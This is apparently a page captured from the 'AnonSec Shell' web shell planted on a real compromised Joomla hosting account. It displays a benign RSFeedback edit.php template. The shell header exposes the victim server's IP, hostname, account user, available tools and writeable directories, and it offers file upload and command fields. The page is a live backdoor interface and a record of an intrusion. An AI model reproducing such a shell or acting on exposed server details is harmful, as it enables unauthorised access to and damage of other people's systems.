AnonSec Shell
Server IP : 54.36.91.62  /  Your IP : 216.73.217.112
Web Server : Apache
System : Linux webm013.cluster127.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
User : coopiak ( 151928)
PHP Version : 8.3.23
Disable Function : _dyuweyrj4,_dyuweyrj4r,dl
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/coopiak/amisdesseniors-fr/nimes/components/com_rsfeedback/views/category/tmpl/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     

Current File : /home/coopiak/amisdesseniors-fr/nimes/components/com_rsfeedback/views/category/tmpl/edit.php
<?php
/**
* @package RSFeedback!
* @copyright (C) 2010-2018 www.rsjoomla.com
* @license GPL, http://www.gnu.org/copyleft/gpl.html
*/

defined('_JEXEC') or die('Restricted access');

use Joomla\CMS\HTML\HTMLHelper;
use Joomla\CMS\Language\Text;
use Joomla\CMS\Router\Route;
use Joomla\CMS\Factory;

HTMLHelper::_('behavior.keepalive');
HTMLHelper::_('behavior.formvalidator'); ?>

<script type="text/javascript">
Joomla.submitbutton = function(task) {
	if (task == 'category.cancel' || document.formvalidator.isValid(document.getElementById('adminForm'))) {
		Joomla.submitform(task);
	}
}
</script>

<div class="edit item-page<?php echo $this->pageclass_sfx;?>">
	<?php if ($this->params->get('show_page_heading')) { ?>
	<div class="page-header">
		<h1><?php echo $this->escape($this->params->get('page_heading')); ?></h1>
	</div>
	<?php } ?>
	<form action="<?php echo Route::_('index.php?option=com_rsfeedback&view=category&layout=edit&id='.Factory::getApplication()->input->get('id', 0, 'int').'&return='.Factory::getApplication()->input->get('return', '', 'base64')); ?>" method="post" name="adminForm" id="adminForm" class="form-validate form-horizontal rsfe_edit_form">
		<fieldset>
			<?php foreach ($this->form->getFieldset('main') as $field) { ?>
			<?php if ($field->type == 'RSFeedbackCaptcha' && !$this->permissions['captcha_category']) continue; ?>
			<?php if ($field->type == 'RSFeedbackCaptcha') echo '<div class="clearfix"></div>'; ?>
			<?php echo $field->renderField(); ?>
			<?php } ?>
			
			<div class="controls mt-3">
                <button type="button" class="btn btn-primary" onclick="Joomla.submitbutton('category.save')">
					<i class="fa fa-check"></i> <?php echo Text::_('JSAVE'); ?>
				</button>
				<button type="button" class="btn btn-danger" onclick="Joomla.submitbutton('category.cancel')">
					<i class="fa fa-ban"></i> <?php echo Text::_('JCANCEL'); ?>
				</button>
			</div>
		</fieldset>
		
		<input type="hidden" name="task" value="" />
		<input type="hidden" name="tmpl" value="<?php echo $this->tmpl;?>" />
		<?php echo $this->form->getInput('id'); ?>
		<?php echo $this->form->getInput('published'); ?>
		<input type="hidden" name="id" value="<?php echo Factory::getApplication()->input->getInt('id');?>" />
		<input type="hidden" name="return" value="<?php echo Factory::getApplication()->input->get('return', '', 'base64');?>" />
		<?php echo HTMLHelper::_('form.token'); ?>
	</form>
</div>

Anon7 - 2022
AnonSec Team